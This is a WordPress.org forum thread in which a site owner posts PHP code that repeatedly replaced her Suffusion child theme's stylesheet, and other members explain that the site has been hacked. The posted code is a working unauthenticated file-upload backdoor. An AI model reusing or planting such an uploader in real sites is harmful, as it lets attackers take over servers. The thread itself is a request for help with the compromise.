WordPress.org

Ready to get started?Download WordPress

Forums

Child theme's style sheet keeps getting strange php inserted (5 posts)

  1. jennsweb
    Member
    Posted 4 months ago #

    Hello,

    I just updated a site that you can see here:

    http://salemmainstreets.org

    The site was built with a child theme on the Suffusion theme.

    The problem is that twice over the past few days I have gone to the site and found all my custom styles removed and this code in place of them on the child theme's style sheet.

    <?php
    if(isset($_POST['Submit'])){
        $filedir = "";
        $maxfile = '2000000';
    
        $userfile_name = $_FILES['image']['name'];
        $userfile_tmp = $_FILES['image']['tmp_name'];
        if (isset($_FILES['image']['name'])) {
            $abod = $filedir.$userfile_name;
            @move_uploaded_file($userfile_tmp, $abod);
    
    echo"<center><b>Done ==> $userfile_name</b></center>";
    }
    }
    else{
    echo'
    <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
    }
    ?>

    Here are the plugins we are using:

    Akismet
    Better WP Security
    Font Awesome 4 Menus
    Google Analytics Dashboard
    NextGEN Gallery
    NextGEN Galleryview
    Use Google Libraries
    WP Web APP Standard.

    What worked the other day was to simply copy the style sheet from my backup of the test site into the child theme's stylesheet. But it's so frustrating to see all my work get blown out of the water! Has anyone else had this happen while using a child theme of Suffusion?
    Thanks!

  2. jennsweb
    Member
    Posted 4 months ago #

    I should note- I need to fix this ASAP for my client since it's a fairly well used site, but I would like to know how/why this keeps happening.
    Cheers!
    Jenn

  3. DionDesigns
    Member
    Posted 4 months ago #

    Witchcraft?

    Sorry, couldn't resist. ;) Anyway, the code you posted allows someone to upload files of any type to the site, which in effect allows that person to take over the site. If the rogue code returns after being deleted, your site may have been hacked.

    You should contact the hosting company immediately and provide them with the information you provided here.

  4. jennsweb
    Member
    Posted 4 months ago #

    Hi Dion,
    Well, with Salem you never know! ;}
    They have had repeated DOS attacks on their server last month before I started working on the new template and the hosting company is very cagey about what's going on. They host the site as a favor and I'm wondering if we should switch to a different hosting company. Uploads via FTP have been a nightmare. it cost me more in work hours than a reliable hosting provider charges in a year.

  5. bcworkz
    Member
    Posted 4 months ago #

    Whether you should change hosts is really a separate issue, though if they do not implement certain security in a shared hosting environment they could be part of the problem. Even though you notify your host as Dion suggests, you are in the best position to immediately protect your site and data from further damage.

    Malicious PHP code on a stylesheet shouldn't be an immediate threat, but someone unauthorized can clearly write to files at will. If that is the case, they do not need any malicious backdoor code, they have direct control of your site. That means you have been hacked. See FAQ My site was hacked for details on how to deal with this.

Reply

You must log in to post.

About this Topic